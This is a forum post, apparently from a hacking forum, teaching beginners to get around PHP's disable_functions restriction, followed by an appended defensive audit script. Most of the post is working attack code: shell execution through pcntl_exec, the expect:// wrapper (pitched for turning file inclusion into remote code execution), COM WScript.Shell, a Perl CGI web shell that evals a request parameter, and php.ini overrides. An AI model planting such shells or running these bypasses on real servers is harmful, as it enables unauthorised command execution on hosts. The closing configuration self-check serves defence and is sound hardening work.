10-06-2013, 01:34 AM
This is a thread I wrote for HF; it should be useful for beginners here that are willing to learn.
Some of you here, but not most (I assume), should already know about the "methods" I'm about to explain and provide examples of.
Let's begin.
Firstly, pcntl_exec() is usually overlooked because it's not a part of the default web package installation of PHP; the PCNTL extension is designed specifically to be utilized in a command-line environment.
It works identically to the *nix-style exec(); the process defined in the first argument of pcntl_exec() is replaced with the process calling it (php, in this case).
PCNTL is enabled by default in the CLI package of PHP; others will need to be compiled with the --enable-pcntl switch.
Bluehost has this extension enabled, just for the record.
PHP Code:
echo extension_loaded('pcntl') ? 'Yes' : 'No'; // Use is_callable('pcntl_exec') when the extension is loaded but the function still can't be called.
pcntl_exec('/bin/bash', array('-c', 'id'));
// You should note that anything after this won't get executed as php is being replaced with /bin/bash.
// Solution? Use pcntl_fork() to fork the current process (php), thus /bin/bash will replace the child process rather than the parent process.
Next is the expect:// wrapper. It isn't included in PHP at all, so don't expect to see it around very much.
The expect extension is available for download on PECL (a repository for PHP extensions). It basically provides access to the given process's STDIN, STDOUT and STDERR via PTY (mainly for SSH and protocols alike).
PHP Code:
echo in_array('expect', stream_get_wrappers()) ? 'Yes' : 'No';
include('expect://id'); // Good for escalating LFI to RCE as well.
COM (Component Object Model) allows you to manipulate applications and services that operate within Windows, independent of the programming language used in the target object. As of PHP version 5.3.15, you'll need to add extension=php_com_dotnet.dll to your php.ini file where appropriate as it was removed. Previous versions of PHP should have it.
The following is a small example I came up with; it will execute a command and pipe it to STDOUT.
PHP Code:
// I usually see $shell->Run() used instead; Run() only returns an integer exit status (how the OS signals success), whereas Exec() exposes the command's StdOut stream.
if(!(extension_loaded('com_dotnet') || dl('php_com_dotnet.dll'))) // Requires enable_dl to be "On" in php.ini.
die('Failed to load the COM extension.');
function wscript_exec($cmd)
{
$shell = new COM('WScript.Shell');
$output = $shell->Exec("cmd /C {$cmd}")->StdOut->ReadAll(); // ReadAll() is a method on the TextStream, so it needs the parentheses.
echo $output;
}
wscript_exec('dir'); // Usage example.
A CGI shell coded in something other than PHP will probably prove to be the most effective method of circumventing disable_functions as it only applies to PHP.
Here's a quick one I wrote; this should be sufficient in most cases.
Perl Code:
#!/usr/bin/perl
use strict;
use warnings;
use CGI;
my $cgi = CGI->new;
my $cmd = $cgi->param('cmd') // ''; # Avoid eval(undef) when no parameter is supplied.
print "Content-Type: text/html\r\n\r\n";
eval($cmd); # String eval of the submitted Perl; it runs under the web server's CGI handler, so PHP's disable_functions never applies.
php.ini override is apparently still a plausible and working method.
This is caused by misconfiguration of SuPHP (suphp.conf); not forcing users to use the global php.ini file defined under [phprc_paths] and/or allowing users to have a php.ini within their public_html directory to specify configuration settings themselves.
What you need to do should be self-explanatory.
If your issue is Suhosin related, then you might want to read [link] to gain some insight on how one would circumvent it. I'll just drop some self-explanatory code here; it might be useful if you're unsure if Suhosin is in the way.
PHP Code:
if(defined('SUHOSIN_PATCH') || extension_loaded('suhosin')) // defined() instead of constant(): constant() warns (or throws on PHP 8) when the constant doesn't exist.
echo ini_get('suhosin.executor.func.blacklist');
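A configuration self-check from the defender's side, added here and not part of the original post: it walks the same avenues the post lists (PCNTL, the expect:// wrapper, COM, dl()/enable_dl, and a php.ini or .user.ini the web user controls, the suPHP case) and reports which ones disable_functions does not cover. It only reads configuration and spawns nothing; the wording of each finding is my own.

```php
<?php
// Added hardening self-check (not from the original post). Run it with
// `php audit.php` or from the web root of the host being audited; it only
// reads configuration and never executes a command.
function disable_functions_audit(): array
{
    $list = strtolower((string) ini_get('disable_functions'));
    $disabled = array_flip(array_filter(array_map('trim', explode(',', $list))));
    $findings = [];

    // pcntl_exec()/pcntl_fork() live in the PCNTL extension and are rarely
    // present in the usual exec/system/passthru/shell_exec list.
    if (extension_loaded('pcntl')) {
        foreach (['pcntl_exec', 'pcntl_fork'] as $fn) {
            if (!isset($disabled[$fn])) {
                $findings[] = "$fn callable: add it to disable_functions or build without --enable-pcntl";
            }
        }
    }
    // expect:// runs a command from include()/fopen(); no function name is involved,
    // so disable_functions cannot block it.
    if (in_array('expect', stream_get_wrappers(), true)) {
        $findings[] = 'expect:// registered: remove the PECL expect extension (or stream_wrapper_unregister it)';
    }
    // On Windows, COM hands out WScript.Shell without any exec-family call.
    if (extension_loaded('com_dotnet')) {
        $findings[] = 'com_dotnet loaded: drop extension=php_com_dotnet.dll from php.ini';
    }
    // dl() loads extensions at runtime and therefore re-opens every avenue above.
    if (filter_var(ini_get('enable_dl'), FILTER_VALIDATE_BOOLEAN) && !isset($disabled['dl'])) {
        $findings[] = 'enable_dl=On and dl() not disabled: set enable_dl=Off';
    }
    // A php.ini the web user can write overrides disable_functions outright.
    foreach (array_filter([php_ini_loaded_file()]) as $ini) {
        if (is_writable($ini)) {
            $findings[] = "$ini is writable by this user: fix its permissions and pin [phprc_paths] in suphp.conf";
        }
    }
    // Per-directory overrides (CGI/suPHP php.ini, CGI/FastCGI .user.ini) in the document root.
    $docroot = isset($_SERVER['DOCUMENT_ROOT']) ? $_SERVER['DOCUMENT_ROOT'] : getcwd();
    foreach (['php.ini', '.user.ini'] as $name) {
        if (is_file("$docroot/$name")) {
            $findings[] = "$docroot/$name exists: per-directory configuration overrides are being honoured";
        }
    }
    return $findings;
}

foreach (disable_functions_audit() ?: ['no gaps found'] as $line) {
    echo $line, PHP_EOL;
}
```

A non-PHP CGI handler (the Perl shell above) is outside what PHP can see about itself; check the web server's ExecCGI/AddHandler settings for that one.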